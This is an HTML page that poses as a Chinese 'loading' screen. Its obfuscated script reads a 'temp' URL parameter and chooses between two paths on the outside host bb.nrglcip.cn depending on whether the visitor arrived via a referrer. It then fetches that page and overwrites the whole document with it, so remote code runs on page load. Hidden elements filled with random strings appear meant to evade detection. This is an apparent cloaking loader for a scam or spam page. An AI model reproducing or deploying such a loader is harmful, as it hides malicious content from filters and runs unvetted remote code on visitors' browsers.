<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CcrPKzx2V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CcrPKzx2V .z1sliWm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CcrPKzx2V .content {
            line-height: 50px;
            text-align: center
        }

        .CcrPKzx2V .img {
            width: 100%
        }

        .CcrPKzx2V .EsPIpcS4i {
            text-align: center
        }

        .CcrPKzx2V .EsPIpcS4i span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CcrPKzx2V .EsPIpcS4i span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CcrPKzx2V .EsPIpcS4i span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CcrPKzx2V .EsPIpcS4i span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CcrPKzx2V .EsPIpcS4i span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CcrPKzx2V .EsPIpcS4i span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CcrPKzx2V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Cqicx3mFFcHn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var TP3qy = Cqicx3mFFcHn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ TP3qy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ TP3qy +".html?a=share";
		}
		
        XzhO9c=url+"#"+new Date().getTime();
        XzhO9c && function() {
            $.get(XzhO9c, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>JDYhigrClCCJ5</a>
<div style='display:none'>KHkMAnneeFSg72kyCGrWSH7oGhZOE</div>
<h1 style='display:none' >FkzBjKhyvaGkvVlorXJ7ezae2k3nqqmSbSOy0YwMyjoxwCU60spWycgCCTujIanNTd0Ir</h1>
<img  src='' style='display:none'>
<span style='display:none'>vQTZVgwSdkelwDWpSdazh</span>
<img  src='' style='display:none'><div class="CcrPKzx2V">
    <div class="z1sliWm">
        <div class="EsPIpcS4i">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>H1x2WDW39eH1ug</div>
<ul style='display:none' >HL1JNieSaE6ptCMiZ3cXg5jfRlOEwsgWYJB8RZkj3RqXhYl8LN1BdZ</ul>
<img  src='' style='display:none'>
<p  style='display:none'>YVn9kyhIFH2bkeuh14pmZj5Dix8FGn9GkiCJaDCt40K4xPMY4bO7BpMq5csZY53R9UNWIjrh6vLu2gvjTZ1yPwvBx</p>
<h1 style='display:none' >lAhgD1NsHcY8m2i</h1></body>
</html>